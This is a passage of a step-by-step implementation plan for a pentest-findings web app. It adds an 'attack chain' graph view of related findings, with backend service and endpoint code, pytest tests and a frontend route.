| Create | Empty state + rebuild progress polling | +| `packages/web/frontend/src/router/index.ts` | Modify 
| Add `/engagements/:id/chain` route | +| `packages/web/frontend/src/views/EngagementDetailView.vue` | Modify | Add "View Attack Chain" button | + +--- + +## Task 1: Backend — `relation_to_link_dict` DTO with drift computation + +**Files:** +- Modify: `packages/web/backend/app/services/chain_dto.py` + +This task adds the conversion function that produces the force-graph link shape with inline drift computation. All subsequent backend tasks depend on this. + +- [ ] **Step 1: Write the `relation_to_link_dict` function** + +Add to `packages/web/backend/app/services/chain_dto.py`: + +```python +def relation_to_link_dict(relation: FindingRelation) -> dict[str, Any]: + """Convert a CLI ``FindingRelation`` to a force-graph link dict. + + Includes drift detection: if the relation has status USER_CONFIRMED + and the current reasons differ from the confirmed_at_reasons snapshot, + drift is True. + """ + status_value = ( + relation.status.value + if hasattr(relation.status, "value") + else str(relation.status) + ) + + # Drift: true if user confirmed but reasons have since changed + drift = False + if status_value == "user_confirmed" and relation.confirmed_at_reasons is not None: + current_rules = sorted(r.rule for r in relation.reasons) + confirmed_rules = sorted(r.rule for r in relation.confirmed_at_reasons) + drift = current_rules != confirmed_rules + + return { + "id": relation.id, + "source": relation.source_finding_id, + "target": relation.target_finding_id, + "value": relation.weight, + "status": status_value, + "drift": drift, + "reasons": [r.rule for r in relation.reasons], + "relation_type": relation.llm_relation_type, + "rationale": relation.llm_rationale, + } +``` + +- [ ] **Step 2: Verify the module still imports cleanly** + +Run: `cd packages/web/backend && python -c "from app.services.chain_dto import relation_to_link_dict; print('OK')"` +Expected: `OK` + +- [ ] **Step 3: Commit** + +```bash +git add packages/web/backend/app/services/chain_dto.py +git commit -m 
"feat(chain): add relation_to_link_dict DTO with drift detection" +``` + +--- + +## Task 2: Backend — `subgraph_for_engagement` service method + +**Files:** +- Modify: `packages/web/backend/app/services/chain_service.py` + +Adds the service method that queries the store for findings + relations scoped to an engagement, applies severity/status filters, enforces max_nodes cap, and returns the force-graph-shaped response. + +- [ ] **Step 1: Add imports at top of chain_service.py** + +Add these imports to the existing import block: + +```python +from app.services.chain_dto import relation_to_link_dict +``` + +- [ ] **Step 2: Add `subgraph_for_engagement` method to `ChainService`** + +```python + async def subgraph_for_engagement( + self, + session: AsyncSession, + *, + user_id: uuid.UUID, + engagement_id: str, + severities: set[str] | None = None, + statuses: set[str] | None = None, + max_nodes: int = 500, + seed_finding_id: str | None = None, + hops: int = 2, + format: str = "force-graph", + ) -> dict[str, Any]: + """Build a filtered subgraph for one engagement. + + Returns a dict with 'graph' (force-graph or canonical shape) + and 'meta' (total_findings, rendered_findings, filtered, generation). 
+ """ + from opentools.chain.config import get_chain_config + from opentools.chain.query.graph_cache import GraphCache + from opentools.chain.query.adapters import to_canonical_json, to_force_graph + from opentools.chain.types import RelationStatus + + from sqlalchemy import select, func + from app.models import Finding, ChainFindingRelation + + store = chain_store_from_session(session) + await store.initialize() + + # Count total findings in engagement (for meta) + total_stmt = select(func.count()).select_from(Finding).where( + Finding.engagement_id == engagement_id, + Finding.user_id == user_id, + Finding.deleted_at.is_(None), + ) + total_result = await session.execute(total_stmt) + total_findings = total_result.scalar() or 0 + + # Fetch findings for this engagement, applying severity filter + finding_stmt = select(Finding).where( + Finding.engagement_id == engagement_id, + Finding.user_id == user_id, + Finding.deleted_at.is_(None), + ) + if severities: + finding_stmt = finding_stmt.where(Finding.severity.in_(severities)) + finding_stmt = finding_stmt.limit(max_nodes) + + finding_result = await session.execute(finding_stmt) + findings = list(finding_result.scalars().all()) + finding_ids = {f.id for f in findings} + + if not finding_ids: + empty_graph = {"nodes": [], "links": []} if format == "force-graph" else {"schema_version": "1.0", "nodes": [], "edges": [], "metadata": {}} + return { + "graph": empty_graph, + "meta": { + "total_findings": total_findings, + "rendered_findings": 0, + "filtered": bool(severities) or total_findings > max_nodes, + "generation": 0, + }, + } + + # Default status filter + if statuses is None: + statuses = {"auto_confirmed", "user_confirmed", "candidate"} + + # Fetch relations where both endpoints are in finding_ids + rel_stmt = select(ChainFindingRelation).where( + ChainFindingRelation.user_id == user_id, + ChainFindingRelation.source_finding_id.in_(finding_ids), + ChainFindingRelation.target_finding_id.in_(finding_ids), + 
ChainFindingRelation.status.in_(statuses), + ) + rel_result = await session.execute(rel_stmt) + relations_orm = list(rel_result.scalars().all()) + + # Build nodes + nodes = [ + { + "id": f.id, + "name": f.title, + "severity": f.severity, + "tool": f.tool, + "phase": f.phase, + } + for f in findings + ] + + # Build links via DTO + from opentools.chain.stores.postgres_async import _orm_to_relation + + links = [ + relation_to_link_dict(_orm_to_relation(r)) + for r in relations_orm + ] + + # Get latest generation from most recent linker run + from app.models import ChainLinkerRun + gen_stmt = ( + select(ChainLinkerRun.generation) + .where(ChainLinkerRun.user_id == user_id) + .order_by(ChainLinkerRun.started_at.desc()) + .limit(1) + ) + gen_result = await session.execute(gen_stmt) + generation = gen_result.scalar() or 0 + + if format == "force-graph": + graph = {"nodes": nodes, "links": links} + else: + graph = { + "schema_version": "1.0", + "nodes": [{"id": n["id"], "type": "finding", "severity": n["severity"], "tool": n["tool"], "title": n["name"]} for n in nodes], + "edges": [{"source": l["source"], "target": l["target"], "weight": l["value"], "status": l["status"], "symmetric": False, "reasons": l["reasons"], "relation_type": l["relation_type"], "rationale": l["rationale"]} for l in links], + "metadata": {"generation": generation, "max_weight": max((l["value"] for l in links), default=0)}, + } + + return { + "graph": graph, + "meta": { + "total_findings": total_findings, + "rendered_findings": len(findings), + "filtered": bool(severities) or len(findings) < total_findings, + "generation": generation, + }, + } +``` + +- [ ] **Step 3: Verify the module still imports** + +Run: `cd packages/web/backend && python -c "from app.services.chain_service import ChainService; print('OK')"` +Expected: `OK` + +- [ ] **Step 4: Commit** + +```bash +git add 
packages/web/backend/app/services/chain_service.py +git commit -m "feat(chain): add subgraph_for_engagement service method" +``` + +--- + +## Task 3: Backend — `update_relation_status` service method + +**Files:** +- Modify: `packages/web/backend/app/services/chain_service.py` + +Adds the service method for edge curation — updates relation status to `user_confirmed` or `user_rejected`, snapshots `confirmed_at_reasons_json` on confirm. + +- [ ] **Step 1: Add `update_relation_status` method to `ChainService`** + +```python + async def update_relation_status( + self, + session: AsyncSession, + *, + user_id: uuid.UUID, + relation_id: str, + new_status: str, + ) -> dict[str, Any] | None: + """Update a relation's status for edge curation. + + Only 'user_confirmed' and 'user_rejected' are valid. + On confirm, snapshots current reasons_json into confirmed_at_reasons_json. + Returns the updated relation dict, or None if not found. + """ + from sqlalchemy import select + from app.models import ChainFindingRelation + from datetime import datetime, timezone + from opentools.chain.stores.postgres_async import _orm_to_relation + from app.services.chain_dto import relation_to_dict + + # Fetch the relation, scoped to user + stmt = select(ChainFindingRelation).where( + ChainFindingRelation.id == relation_id, + ChainFindingRelation.user_id == user_id, + ) + result = await session.execute(stmt) + relation = result.scalar_one_or_none() + if relation is None: + return None + + # Update status + relation.status = new_status + relation.updated_at = datetime.now(timezone.utc) + + # On confirm, snapshot current reasons for drift detection + if new_status == "user_confirmed": + relation.confirmed_at_reasons_json = relation.reasons_json + + session.add(relation) + await session.commit() + await session.refresh(relation) + + return relation_to_dict(_orm_to_relation(relation)) +``` + +- [ ] **Step 2: Verify import** + +Run: `cd packages/web/backend && python -c "from
app.services.chain_service import ChainService; print('OK')"` +Expected: `OK` + +- [ ] **Step 3: Commit** + +```bash +git add packages/web/backend/app/services/chain_service.py +git commit -m "feat(chain): add update_relation_status for edge curation" +``` + +--- + +## Task 4: Backend — Subgraph and curation route endpoints + +**Files:** +- Modify: `packages/web/backend/app/routes/chain.py` + +Adds `GET /api/chain/subgraph` and `PATCH /api/chain/relations/{relation_id}`. + +- [ ] **Step 1: Add new Pydantic models for the endpoints** + +Add to `packages/web/backend/app/routes/chain.py`, after the existing model classes: + +```python +class SubgraphMeta(BaseModel): + total_findings: int + rendered_findings: int + filtered: bool + generation: int + + +class SubgraphResponse(BaseModel): + graph: dict + meta: SubgraphMeta + + +class RelationStatusUpdate(BaseModel): + status: str +``` + +- [ ] **Step 2: Add the subgraph endpoint** + +```python +@router.get("/subgraph", response_model=SubgraphResponse) +async def get_subgraph( + engagement_id: str, + severity: Optional[str] = None, + status: Optional[str] = None, + max_nodes: int = 500, + seed_finding_id: Optional[str] = None, + hops: int = 2, + format: str = "force-graph", + db: AsyncSession = Depends(get_db), + user: User = Depends(get_current_user), + service: ChainService = Depends(get_chain_service), +) -> SubgraphResponse: + severities = set(severity.split(",")) if severity else None + statuses = set(status.split(",")) if status else None + + result = await service.subgraph_for_engagement( + db, + user_id=user.id, + engagement_id=engagement_id, + severities=severities, + statuses=statuses, + max_nodes=max_nodes, + seed_finding_id=seed_finding_id, + hops=hops, + format=format, + ) + return SubgraphResponse( + graph=result["graph"], + meta=SubgraphMeta(**result["meta"]), + ) +``` + +- [ ] **Step 3: Add the relation curation endpoint** + +```python +@router.patch("/relations/{relation_id}") +async def update_relation( 
+ relation_id: str, + body: RelationStatusUpdate, + db: AsyncSession = Depends(get_db), + user: User = Depends(get_current_user), + service: ChainService = Depends(get_chain_service), +): + valid_statuses = {"user_confirmed", "user_rejected"} + if body.status not in valid_statuses: + raise HTTPException( + status_code=status.HTTP_422_UNPROCESSABLE_ENTITY, + detail=f"status must be one of: {', '.join(valid_statuses)}", + ) + + result = await service.update_relation_status( + db, user_id=user.id, relation_id=relation_id, new_status=body.status, + ) + if result is None: + raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="relation not found") + return result +``` + +- [ ] **Step 4: Verify the app starts** + +Run: `cd packages/web/backend && python -c "from app.main import app; print('OK')"` +Expected: `OK` + +- [ ] **Step 5: Commit** + +```bash +git add packages/web/backend/app/routes/chain.py +git commit -m "feat(chain): add subgraph and relation curation endpoints" +``` + +--- + +## Task 5: Backend — Subgraph endpoint tests + +**Files:** +- Create: `packages/web/backend/tests/test_chain_subgraph.py` + +- [ ] **Step 1: Write subgraph endpoint tests** + +Create `packages/web/backend/tests/test_chain_subgraph.py`: + +```python +"""Subgraph endpoint tests (Phase 3C.2).""" + +import uuid +from datetime import datetime, timezone + +import pytest + +from app.models import ChainFindingRelation, Engagement, Finding +from tests.conftest import test_session_factory + +NOW = datetime.now(timezone.utc) + + +async def _get_user_id(auth_client) -> uuid.UUID: + eng_resp = await auth_client.post("/api/v1/engagements", json={ + "name": "_uid_probe", "target": "127.0.0.1", "type": "pentest", + }) + assert eng_resp.status_code == 201 + eng_id = eng_resp.json()["id"] + async with test_session_factory() as session: + from sqlalchemy import select + from app.models import Engagement as Eng + result = await session.execute(select(Eng).where(Eng.id == eng_id)) + eng = 
result.scalar_one() + return eng.user_id + + +async def _seed_engagement(user_id, eng_id): + async with test_session_factory() as session: + session.add(Engagement( + id=eng_id, user_id=user_id, name="Test", target="10.0.0.0/24", + type="pentest", created_at=NOW, updated_at=NOW, + )) + await session.commit() + + +async def _seed_finding(user_id, eng_id, finding_id, severity="high", phase=None): + async with test_session_factory() as session: + session.add(Finding( + id=finding_id, user_id=user_id, engagement_id=eng_id, + tool="nmap", severity=severity, title=f"Finding {finding_id}", + phase=phase, created_at=NOW, + )) + await session.commit() + + +async def _seed_relation(user_id, src_id, tgt_id, rel_id, status="auto_confirmed", weight=0.8): + async with test_session_factory() as session: + session.add(ChainFindingRelation( + id=rel_id, user_id=user_id, source_finding_id=src_id, + target_finding_id=tgt_id, weight=weight, status=status, + symmetric=False, created_at=NOW, updated_at=NOW, + )) + await session.commit() + + +@pytest.mark.asyncio +async def test_subgraph_empty_engagement(auth_client): + """Engagement with no findings returns empty graph.""" + user_id = await _get_user_id(auth_client) + await _seed_engagement(user_id, "eng-empty") + + resp = await auth_client.get("/api/chain/subgraph?engagement_id=eng-empty") + assert resp.status_code == 200 + data = resp.json() + assert data["graph"]["nodes"] == [] + assert data["graph"]["links"] == [] + assert data["meta"]["total_findings"] == 0 + assert data["meta"]["rendered_findings"] == 0 + + +@pytest.mark.asyncio +async def test_subgraph_returns_nodes_and_links(auth_client): + """Seeded findings and relations appear in subgraph response.""" + user_id = await _get_user_id(auth_client) + await _seed_engagement(user_id, "eng-sub") + await _seed_finding(user_id, "eng-sub", "f-1", severity="critical") + await _seed_finding(user_id, "eng-sub", "f-2", severity="high") + await _seed_relation(user_id, "f-1", "f-2", "rel-1") 
+ + resp = await auth_client.get("/api/chain/subgraph?engagement_id=eng-sub") + assert resp.status_code == 200 + data = resp.json() + assert len(data["graph"]["nodes"]) == 2 + assert len(data["graph"]["links"]) == 1 + link = data["graph"]["links"][0] + assert link["id"] == "rel-1" + assert link["source"] == "f-1" + assert link["target"] == "f-2" + assert "drift" in link + + +@pytest.mark.asyncio +async def test_subgraph_severity_filter(auth_client): + """Severity filter excludes non-matching findings.""" + user_id = await _get_user_id(auth_client) + await _seed_engagement(user_id, "eng-sev") + await _seed_finding(user_id, "eng-sev", "f-crit", severity="critical") + await _seed_finding(user_id, "eng-sev", "f-low", severity="low") + + resp = await auth_client.get("/api/chain/subgraph?engagement_id=eng-sev&severity=critical") + assert resp.status_code == 200 + data = resp.json() + assert len(data["graph"]["nodes"]) == 1 + assert data["graph"]["nodes"][0]["severity"] == "critical" + + +@pytest.mark.asyncio +async def test_subgraph_status_filter(auth_client): + """Status filter excludes non-matching relations.""" + user_id = await _get_user_id(auth_client) + await _seed_engagement(user_id, "eng-stat") + await _seed_finding(user_id, "eng-stat", "f-a") + await _seed_finding(user_id, "eng-stat", "f-b") + await _seed_relation(user_id, "f-a", "f-b", "rel-conf", status="auto_confirmed") + await _seed_relation(user_id, "f-b", "f-a", "rel-cand", status="candidate") + + # Only auto_confirmed + resp = await auth_client.get( + "/api/chain/subgraph?engagement_id=eng-stat&status=auto_confirmed" + ) + data = resp.json() + assert len(data["graph"]["links"]) == 1 + assert data["graph"]["links"][0]["status"] == "auto_confirmed" + + +@pytest.mark.asyncio +async def test_subgraph_max_nodes_cap(auth_client): + """max_nodes caps the number of returned findings.""" + user_id = await _get_user_id(auth_client) + await _seed_engagement(user_id, "eng-cap") + for i in range(10): + await 
_seed_finding(user_id, "eng-cap", f"f-cap-{i}") + + resp = await auth_client.get("/api/chain/subgraph?engagement_id=eng-cap&max_nodes=3") + data = resp.json() + assert len(data["graph"]["nodes"]) == 3 + assert data["meta"]["total_findings"] == 10 + assert data["meta"]["filtered"] is True + + +@pytest.mark.asyncio +async def test_subgraph_unauthenticated(client): + """Unauthenticated request returns 401.""" + resp = await client.get("/api/chain/subgraph?engagement_id=eng-x") + assert resp.status_code == 401 +``` + +- [ ] **Step 2: Run the tests** + +Run: `cd packages/web/backend && python -m pytest tests/test_chain_subgraph.py -v` +Expected: all tests PASS + +- [ ] **Step 3: Commit** + +```bash +git add packages/web/backend/tests/test_chain_subgraph.py +git commit -m "test(chain): subgraph endpoint tests — filters, cap, auth" +``` + +--- + +## Task 6: Backend — Curation endpoint tests + +**Files:** +- Create: `packages/web/backend/tests/test_chain_curation.py` + +- [ ] **Step 1: Write curation endpoint tests** + +Create `packages/web/backend/tests/test_chain_curation.py`: + +```python +"""Relation curation (PATCH) endpoint tests (Phase 3C.2).""" + +import uuid +from datetime import datetime, timezone + +import pytest + +from app.models import ChainFindingRelation, Engagement, Finding +from tests.conftest import test_session_factory + +NOW = datetime.now(timezone.utc) + + +async def _get_user_id(auth_client) -> uuid.UUID: + eng_resp = await auth_client.post("/api/v1/engagements", json={ + "name": "_uid_probe", "target": "127.0.0.1", "type": "pentest", + }) + assert eng_resp.status_code == 201 + eng_id = eng_resp.json()["id"] + async with test_session_factory() as session: + from sqlalchemy import select + from app.models import Engagement as Eng + result = await session.execute(select(Eng).where(Eng.id == eng_id)) + eng = result.scalar_one() + return eng.user_id + + +async def _seed_with_relation(user_id, rel_id="rel-cur", status="candidate"): + async with 
test_session_factory() as session: + session.add(Engagement( + id="eng-cur", user_id=user_id, name="Test", target="10.0.0.1", + type="pentest", created_at=NOW, updated_at=NOW, + )) + await session.flush() + session.add(Finding( + id="f-cur-1", user_id=user_id, engagement_id="eng-cur", + tool="nmap", severity="high", title="Finding 1", created_at=NOW, + )) + session.add(Finding( + id="f-cur-2", user_id=user_id, engagement_id="eng-cur", + tool="nuclei", severity="medium", title="Finding 2", created_at=NOW, + )) + await session.flush() + session.add(ChainFindingRelation( + id=rel_id, user_id=user_id, source_finding_id="f-cur-1", + target_finding_id="f-cur-2", weight=0.75, status=status, + symmetric=False, reasons_json=b'[{"rule":"shared_strong_entity","weight_contribution":0.5,"idf_factor":null,"details":{}}]', + created_at=NOW, updated_at=NOW, + )) + await session.commit() + + +@pytest.mark.asyncio +async def test_confirm_candidate(auth_client): + """Confirming a candidate relation succeeds.""" + user_id = await _get_user_id(auth_client) + await _seed_with_relation(user_id, "rel-c1", status="candidate") + + resp = await auth_client.patch( + "/api/chain/relations/rel-c1", + json={"status": "user_confirmed"}, + ) + assert resp.status_code == 200 + assert resp.json()["status"] == "user_confirmed" + + +@pytest.mark.asyncio +async def test_reject_candidate(auth_client): + """Rejecting a candidate relation succeeds.""" + user_id = await _get_user_id(auth_client) + await _seed_with_relation(user_id, "rel-c2", status="candidate") + + resp = await auth_client.patch( + "/api/chain/relations/rel-c2", + json={"status": "user_rejected"}, + ) + assert resp.status_code == 200 + assert resp.json()["status"] == "user_rejected" + + +@pytest.mark.asyncio +async def test_toggle_confirmed_to_rejected(auth_client): + """User can change from confirmed to rejected.""" + user_id = await _get_user_id(auth_client) + await _seed_with_relation(user_id, "rel-c3", status="user_confirmed") + + resp 
= await auth_client.patch( + "/api/chain/relations/rel-c3", + json={"status": "user_rejected"}, + ) + assert resp.status_code == 200 + assert resp.json()["status"] == "user_rejected" + + +@pytest.mark.asyncio +async def test_invalid_status_returns_422(auth_client): + """Setting auto_confirmed via PATCH returns 422.""" + user_id = await _get_user_id(auth_client) + await _seed_with_relation(user_id, "rel-c4") + + resp = await auth_client.patch( + "/api/chain/relations/rel-c4", + json={"status": "auto_confirmed"}, + ) + assert resp.status_code == 422 + + +@pytest.mark.asyncio +async def test_nonexistent_relation_returns_404(auth_client): + """Patching a nonexistent relation returns 404.""" + resp = await auth_client.patch( + "/api/chain/relations/rel-does-not-exist", + json={"status": "user_confirmed"}, + ) + assert resp.status_code == 404 + + +@pytest.mark.asyncio +async def test_confirm_snapshots_reasons(auth_client): + """Confirming snapshots reasons_json into confirmed_at_reasons_json.""" + user_id = await _get_user_id(auth_client) + await _seed_with_relation(user_id, "rel-c5", status="candidate") + + await auth_client.patch( + "/api/chain/relations/rel-c5", + json={"status": "user_confirmed"}, + ) + + # Verify in DB + async with test_session_factory() as session: + from sqlalchemy import select + result = await session.execute( + select(ChainFindingRelation).where(ChainFindingRelation.id == "rel-c5") + ) + rel = result.scalar_one() + assert rel.confirmed_at_reasons_json is not None + assert rel.confirmed_at_reasons_json == rel.reasons_json + + +@pytest.mark.asyncio +async def test_unauthenticated_returns_401(client): + """Unauthenticated curation request returns 401.""" + resp = await client.patch( + "/api/chain/relations/rel-x", + json={"status": "user_confirmed"}, + ) + assert resp.status_code == 401 +``` + +- [ ] **Step 2: Run the tests** + +Run: `cd packages/web/backend && python -m pytest tests/test_chain_curation.py -v` +Expected: all tests PASS + +- [ ] 
**Step 3: Commit** + +```bash +git add packages/web/backend/tests/test_chain_curation.py +git commit -m "test(chain): curation endpoint tests — transitions, validation, auth" +``` + +--- + +## Task 7: Frontend — Install `force-graph` and add route + +**Files:** +- Modify: `packages/web/frontend/package.json` (via npm) +- Modify: `packages/web/frontend/src/router/index.ts` +- Modify: `packages/web/frontend/src/views/EngagementDetailView.vue` + +- [ ] **Step 1: Install force-graph** + +Run: `cd packages/web/frontend && npm install force-graph` + +- [ ] **Step 2: Add the chain route to router** + +In `packages/web/frontend/src/router/index.ts`, add after the `finding-detail` route: + +```typescript + { path: '/engagements/:id/chain', name: 'engagement-chain', component: () => import('@/views/ChainGraphView.vue') }, +``` + +- [ ] **Step 3: Add "View Attack Chain" button to EngagementDetailView** + +In `packages/web/frontend/src/views/EngagementDetailView.vue`, add a button next to the existing Delete button in the header: + +Find the `